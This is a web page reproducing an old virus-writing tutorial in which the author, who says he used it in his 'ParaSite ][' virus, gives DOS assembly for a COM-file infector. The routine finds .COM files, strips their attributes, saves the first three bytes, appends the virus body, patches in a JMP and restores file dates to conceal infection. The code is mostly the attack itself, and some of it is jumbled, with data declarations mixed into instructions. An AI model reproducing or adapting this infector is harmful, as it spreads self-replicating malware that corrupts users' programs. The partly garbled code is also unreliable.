Académique Documents
Professionnel Documents
Culture Documents
Well I must state my opinion that there are certainly WAY too many
Overwriting Viruses out here. To help put a Stop to this I will try
to explain to you a SIMPLE way to infect COM files at the END of the
Program. This routine WORKS if you follow my steps correctly, and
I've already used this in my `ParaSite ][' Virus.
Anyhow this is a brief description what the ASM Source will do.
1. Find a .COM file in the current Directory
2. Save the Date and File's Attribute.
3. Save the First 3 Bytes in a Stack
4. Infect the File & restore new 3 bytes..
5. Put the OLD date and File Attributes back on
Beginning...
~~~~~~~~~~~~
;----------------------------------------------------------------------
; The Simple routine to Search for a .COM File...
;----------------------------------------------------------------------
com_files db "*.com",0
mov ah,4eh ;point to a *.COM file...
mov dx,com_files
mov cx,3 ;Attributes with ReadOnly or Hidden
int 21h ;is A okay...
cmp ax,12h ;Any files found?
je exit ;If no Files found Exit...
jmp found_file
; Instead of Exiting here you can make the Virus go and change dir and
; look for several other .com files else where... with the help of the
; path or simply searching for more <dir>...
found_file:
mov di,[si+file] ;di points to the filename
push si
add si,file ;si points to filename...
mov ax,offset 4300h ;get file Attributes...
mov dx,si ;filename in dx..
int 21h
mov file_attrib,cx ;Save file Attributes.
file dw 0
; Here we'll set the file attributes to nothing
mov ax,offset 4301h ;To set file Attributes...
mov cx,offset 0fffeh ;Set them to a Normal File
mov dx,si ;filename...
int 21h
mov ax,offset 3d02h ;Open File to Read/Write.
mov dx,si ;ASCIIZ filename
int 21h
jnb ok ;If file was open continue
jmp put_old_attrib ; error happened restore old attribs
; and quit.
ok:
mov bx,ax
mov ax,offset 5700h ;Get File Date & Time...
int 21h
mov old_time,cx ;Save old File Time...
mov old_date,dx ;Save old File Date
old_time db 0
old_date db 0
; here we infect the file... but first we SAVE the first 3 bytes
; somewhere in our virus
mov ah,3fh ;Read file...
mov cx,3 ;Number of bytes to read
mov dx,first_3 ;Save bytes in the buffer
add dx,si ;Filename...
int 21h
cmp ax,3 ;Where 3 bytes read?
jnz fix_file ;If not fix file like before and quit
first_3 equ $ ; The First three bytes of the Original File!
int 20h ; the virus is infected to.
nop
; This moves the File pointer to the END of the file
mov ax,offset 4202h
mov cx,0
mov dx,0
int 21h
mov cx,ax ;DX:AX is the FILESIZE!
sub ax,3 ;subtract three because of file pointer
add cx,offset c_len_y
mov di,si
sub di,offset c_len_x
mov [di],cx ;Modifies the 2nd & 3rd bytes of program
; The writes our virus to the file
mov ah,40h
mov cx,virlength ;Virus Length
mov dx,si ;File...
sub dx,offset codelength ;Length of virus codes.
int 21h
cmp ax,offset virlength ;all bytes written?
jnz fix_file ;If no fix file and quit
;Moves the file pointer to the beginning of file and write the
;3 bytes JMP at the beginning of the file
mov ax,offset 4200h
mov cx,0
mov dx,0
int 21h
mov ah,40h ;Write to file...
mov cx,3 ;# of bytes to write...
mov dx,si ;File name...
add dx,jump ;Point to the new JMP statement
int 21h
jump db 0e9h ;This is the JMP that will be put in the
;Begining of the file!
;Restore Old File Time & Date
fix_file:
mov dx,old_date ;Old File Date
mov cx,old_time ;Old file Time...
and cx,offset 0ffe0h ;Flat Attribs.
mov ax,offset 5701h
int 21h
mov ah,3eh
int 21h ;Close file...